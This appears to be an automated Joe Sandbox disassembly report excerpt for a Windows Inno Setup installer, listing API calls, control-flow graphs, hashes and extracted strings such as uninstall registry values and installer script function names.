call 415250 SetFocus 1991->2012 2009 423f0d-423f10 1994->2009 1995->1889 2005->1889 2015 423fb2-423fbc 2005->2015 2009->1995 2012->1889 2015->1889
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                            • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                            • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                            • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                            APIs
                                                                                              • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                              • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                              • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                              • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                              • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                              • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                              • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                              • Part of subcall function 00493C7C: 73A0A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                              • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                              • Part of subcall function 00493C7C: 73A0A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                              • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021AD8D0,021AF524,?,?,021AF554,?,?,021AF5A4,?), ref: 00467B3B
                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                              • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                            • String ID: $(Default)$STOPIMAGE
                                                                                            • API String ID: 3271511185-770201673
                                                                                            • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                            • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                                            • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                            • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID: unins$unins???.*
                                                                                            • API String ID: 3541575487-1009660736
                                                                                            • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                            • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                                            • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                            • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                            • String ID:
                                                                                            • API String ID: 873889042-0
                                                                                            • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                            • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                                            • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                            • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                                            • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstanceVersion
                                                                                            • String ID:
                                                                                            • API String ID: 1462612201-0
                                                                                            • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                            • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                                            • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                            • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                            • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                            • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                            • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                            • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID:
                                                                                            • API String ID: 2645101109-0
                                                                                            • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                            • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                                            • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                            • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                                            APIs
                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: NtdllProc_Window
                                                                                            • String ID:
                                                                                            • API String ID: 4255912815-0
                                                                                            • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                            • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                            • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                            • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 406 46e080-46e0b2 407 46e0b4-46e0bb 406->407 408 46e0cf 406->408 409 46e0c6-46e0cd 407->409 410 46e0bd-46e0c4 407->410 411 46e0d6-46e10e call 403634 call 403738 call 42dde8 408->411 409->411 410->408 410->409 418 46e110-46e124 call 403738 call 42dde8 411->418 419 46e129-46e152 call 403738 call 42dd0c 411->419 418->419 427 46e154-46e15d call 46dd50 419->427 428 46e162-46e18b call 46de6c 419->428 427->428 432 46e19d-46e1a0 call 403400 428->432 433 46e18d-46e19b call 403494 428->433 437 46e1a5-46e1f0 call 46de6c call 42c40c call 46deb4 call 46de6c 432->437 433->437 446 46e206-46e227 call 454ab8 call 46de6c 437->446 447 46e1f2-46e205 call 46dedc 437->447 454 46e27d-46e284 446->454 455 46e229-46e27c call 46de6c call 478464 call 46de6c call 478464 call 46de6c 446->455 447->446 456 46e286-46e2c3 call 478464 call 46de6c call 478464 call 46de6c 454->456 457 46e2c4-46e2cb 454->457 455->454 456->457 461 46e30c-46e331 call 40b44c call 46de6c 457->461 462 46e2cd-46e30b call 46de6c * 3 457->462 481 46e333-46e33e call 47ad88 461->481 482 46e340-46e349 call 403494 461->482 462->461 492 46e34e-46e51b call 403778 call 46de6c call 47ad88 call 46deb4 call 403494 call 40357c * 2 call 46de6c call 403494 call 40357c * 2 call 46de6c call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 call 46deb4 call 47ad88 481->492 482->492 556 46e531-46e53f call 46dedc 492->556 557 46e51d-46e52f call 46de6c 492->557 560 46e544 556->560 562 46e545-46e58e call 46dedc call 46df10 call 46de6c call 47ad88 call 46df74 557->562 560->562 573 46e5b4-46e5be 562->573 574 46e590-46e5ae call 46dedc * 2 562->574 575 46e5c4-46e5cb 573->575 576 46e662-46e669 573->576 587 46e5b3 574->587 579 46e62f-46e63a 575->579 580 46e5cd-46e5f1 call 430a40 575->580 581 46e6c3-46e6d9 RegCloseKey 576->581 582 46e66b-46e6a1 call 49314c 576->582 584 46e63d-46e641 579->584 580->584 592 46e5f3-46e5f4 580->592 582->581 584->576 588 46e643-46e65c call 430a7c call 46dedc 584->588 587->573 597 46e661 588->597 594 46e5f6-46e61c call 40b44c call 4780d8 592->594 601 46e61e-46e624 call 430a40 594->601 602 46e629-46e62b 594->602 597->576 601->602 602->594 603 46e62d 602->603 603->584
                                                                                            APIs
                                                                                              • Part of subcall function 0046DE6C: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00474FCB,0049B178,?,0046E183,?,00000000,0046E6DA,?,_is1), ref: 0046DE8F
                                                                                            • RegCloseKey.ADVAPI32(?,0046E6E1,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046E72C,?,?,0049B178,00000000), ref: 0046E6D4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValue
                                                                                            • String ID: " /SILENT$5.4.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3132538880-1122008755
                                                                                            • Opcode ID: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                            • Instruction ID: d6e88d1f6cb7b2cefc9fba2fbd39931f8be9331f85677ee55fb68547bd3bf3cf
                                                                                            • Opcode Fuzzy Hash: 8e42fddb56d3329dbef7a6a297206f9074c7af5ead7140c5731b4336ecc3ba8d
                                                                                            • Instruction Fuzzy Hash: C3123034F001089BCB04EB56E981ADE77F5EF58304F60807BE8116B3A5EB79AD45CB5A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1019 490c98-490ccc call 403684 1022 490cce-490cdd call 4467f0 Sleep 1019->1022 1023 490ce2-490cef call 403684 1019->1023 1028 491172-49118c call 403420 1022->1028 1029 490d1e-490d2b call 403684 1023->1029 1030 490cf1-490d19 call 44684c call 403738 FindWindowA call 446acc 1023->1030 1037 490d5a-490d67 call 403684 1029->1037 1038 490d2d-490d50 call 44684c call 403738 FindWindowA call 446acc 1029->1038 1030->1028 1047 490d69-490dab call 4467f0 * 4 SendMessageA call 446acc 1037->1047 1048 490db0-490dbd call 403684 1037->1048 1056 490d55 1038->1056 1047->1028 1057 490e0c-490e19 call 403684 1048->1057 1058 490dbf-490e07 call 4467f0 * 4 PostMessageA call 446924 1048->1058 1056->1028 1067 490e68-490e75 call 403684 1057->1067 1068 490e1b-490e63 call 4467f0 * 4 SendNotifyMessageA call 446924 1057->1068 1058->1028 1080 490ea2-490eaf call 403684 1067->1080 1081 490e77-490e9d call 44684c call 403738 RegisterClipboardFormatA call 446acc 1067->1081 1068->1028 1092 490eb1-490eeb call 4467f0 * 3 SendMessageA call 446acc 1080->1092 1093 490ef0-490efd call 403684 1080->1093 1081->1028 1092->1028 1108 490eff-490f3f call 4467f0 * 3 PostMessageA call 446924 1093->1108 1109 490f44-490f51 call 403684 1093->1109 1108->1028 1119 490f98-490fa5 call 403684 1109->1119 1120 490f53-490f93 call 4467f0 * 3 SendNotifyMessageA call 446924 1109->1120 1131 490ffa-491007 call 403684 1119->1131 1132 490fa7-490fc5 call 44684c call 42e2bc 1119->1132 1120->1028 1142 491009-491035 call 44684c call 403738 call 4467f0 GetProcAddress 1131->1142 1143 491081-49108e call 403684 1131->1143 1152 490fd7-490fe5 GetLastError call 446acc 1132->1152 1153 490fc7-490fd5 call 446acc 1132->1153 1177 491071-49107c call 446924 1142->1177 1178 491037-49106c call 4467f0 * 2 call 446acc call 446924 1142->1178 1157 491090-4910b1 call 4467f0 FreeLibrary call 446924 1143->1157 1158 4910b6-4910c3 call 403684 1143->1158 1164 490fea-490ff5 call 446acc 1152->1164 1153->1164 1157->1028 1170 4910e8-4910f5 call 403684 1158->1170 1171 4910c5-4910e3 call 44684c call 403738 CreateMutexA 1158->1171 1164->1028 1185 49112b-491138 call 403684 1170->1185 1186 4910f7-491129 call 48ae84 call 403574 call 403738 OemToCharBuffA call 48ae9c 1170->1186 1171->1028 1177->1028 1178->1028 1195 49113a-49116c call 48ae84 call 403574 call 403738 CharToOemBuffA call 48ae9c 1185->1195 1196 49116e 1185->1196 1186->1028 1195->1028 1196->1028
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,0049118D,?,?,?,?,00000000,00000000,00000000), ref: 00490CD8
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 00490D09
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                            • Instruction ID: 3689c34fe079b887eecbe3c8abd258a9be24a9666ebde3bfb919725182042c62
                                                                                            • Opcode Fuzzy Hash: 4688106ba75806e635d0f748856e326098f1ac44329b3e50716d9597bb099cff
                                                                                            • Instruction Fuzzy Hash: 8EC19C60B002026BDB14BB3E8C8291E599A9FC9708B11D93FF546EB79ACD3DDD06435E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1573 481df0-481e15 GetModuleHandleA GetProcAddress 1574 481e7c-481e81 GetSystemInfo 1573->1574 1575 481e17-481e2d GetNativeSystemInfo GetProcAddress 1573->1575 1577 481e86-481e8f 1574->1577 1576 481e2f-481e3a GetCurrentProcess 1575->1576 1575->1577 1576->1577 1584 481e3c-481e40 1576->1584 1578 481e9f-481ea6 1577->1578 1579 481e91-481e95 1577->1579 1580 481ec1-481ec6 1578->1580 1582 481ea8-481eaf 1579->1582 1583 481e97-481e9b 1579->1583 1582->1580 1585 481e9d-481eba 1583->1585 1586 481eb1-481eb8 1583->1586 1584->1577 1587 481e42-481e49 call 451d7c 1584->1587 1585->1580 1586->1580 1587->1577 1591 481e4b-481e58 GetProcAddress 1587->1591 1591->1577 1592 481e5a-481e71 GetModuleHandleA GetProcAddress 1591->1592 1592->1577 1593 481e73-481e7a 1592->1593 1593->1577
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00481E01
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00481E0E
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E1C
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00481E24
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00481E30
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00481E51
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00481E64
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00481E6A
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00481E81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
